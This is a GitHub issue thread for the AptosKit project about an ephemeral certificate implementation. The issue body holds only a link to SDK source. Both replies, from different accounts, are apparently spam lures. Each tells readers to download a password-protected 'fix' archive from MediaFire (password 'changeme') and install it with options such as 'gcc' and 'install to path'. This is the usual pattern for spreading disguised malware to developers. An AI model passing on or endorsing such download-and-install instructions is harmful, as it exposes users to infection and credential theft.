### ISSUE TITLE
Ephemeral Certificate Implementation

### ISSUE THREAD

**Issue by MarcoDotIO** [OpenDive/AptosKit#127]
https://github.com/aptos-labs/aptos-ts-sdk/blob/1ee219219cd13a811509c70a96b9e06839b2d1b0/src/core/crypto/keyless.ts#L297

**Comment by AMSNX** [comment]
Download 
https://www.mediafire.com/file/czdodbba054p738/fix.rar/file
password: changeme
In the installer menu, select "gcc."

**Comment by jia6214876** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
